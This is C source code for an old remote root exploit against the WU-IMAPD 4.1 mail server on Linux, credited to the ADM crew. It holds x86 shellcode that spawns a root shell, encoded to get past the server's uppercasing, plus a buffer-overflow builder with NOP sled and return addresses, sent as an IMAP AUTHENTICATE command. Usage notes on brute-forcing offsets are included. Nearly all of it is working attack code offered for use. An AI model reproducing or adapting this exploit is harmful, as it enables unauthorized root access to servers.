/* THIS IS UNPUBLISHED PROPRIETARY SOURCE CODE OF THE ADM CREW Linux WU-IMAPD 4.1 remote root exploit (4/98) by ndubee||plaguez dube0866@eurobretagne.fr Usage: ./imapx where offset = -500..500 (brute force if 0 doesnt work) Credits: - Cheez Whiz (original x86 BSD exploit) - #!w00w00 and #!ADM Note: if you plan to port this to other OS., make sure the shellcode doesn't contain lower case chars since imapd will toupper() the shellcode, thus fucking it up. */ #include #include #include #include #define BUFLEN 2048 #define NOP 0x90 char shell[] = /* jmp 56 popl %esi movl %esi,%ebx movl %ebx,%eax addb $0x20,0x1(%esi) addb $0x20,0x2(%esi) addb $0x20,0x3(%esi) addb $0x20,0x5(%esi) addb $0x20,0x6(%esi) movl %esi,%edi addl $0x7,%edi xorl %eax,%eax stosb %al,%es:(%edi) movl %edi,%ecx movl %esi,%eax stosl %eax,%es:(%edi) movl %edi,%edx xorl %eax,%eax stosl %eax,%es:(%edi) movb $0x8,%al addb $0x3,%al int $0x80 xorl %ebx,%ebx movl %ebx,%eax incl %eax int $0x80 call -61 .string \"/BIN/SH\" .byte 0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff ;markup */ "\xeb\x38\x5e\x89\xf3\x89\xd8\x80" "\x46\x01\x20\x80\x46\x02\x20\x80" "\x46\x03\x20\x80\x46\x05\x20\x80" "\x46\x06\x20\x89\xf7\x83\xc7\x07" "\x31\xc0\xaa\x89\xf9\x89\xf0\xab" "\x89\xfa\x31\xc0\xab\xb0\x08\x04" "\x03\xcd\x80\x31\xdb\x89\xd8\x40" "\xcd\x80\xe8\xc3\xff\xff\xff\x2f" "\x42\x49\x4e\x2f\x53\x48\x00"; void main (int argc, char *argv[]) { char buf[BUFLEN]; int offset=0,nop,i; unsigned long esp; fprintf(stderr,"usage: %s \n", argv[0]); nop = 403; esp = 0xbffff520; if(argc>1) offset = atoi(argv[1]); memset(buf, NOP, BUFLEN); memcpy(buf+(long)nop, shell, strlen(shell)); for (i = 512; i < BUFLEN - 4; i += 4) *((int *) &buf[i]) = esp + (long) offset; printf("* AUTHENTICATE {%d}\r\n", BUFLEN); for (i = 0; i < BUFLEN; i++) putchar(buf[i]); printf("\r\n"); return; } /* www.hack.co.za [2000]*/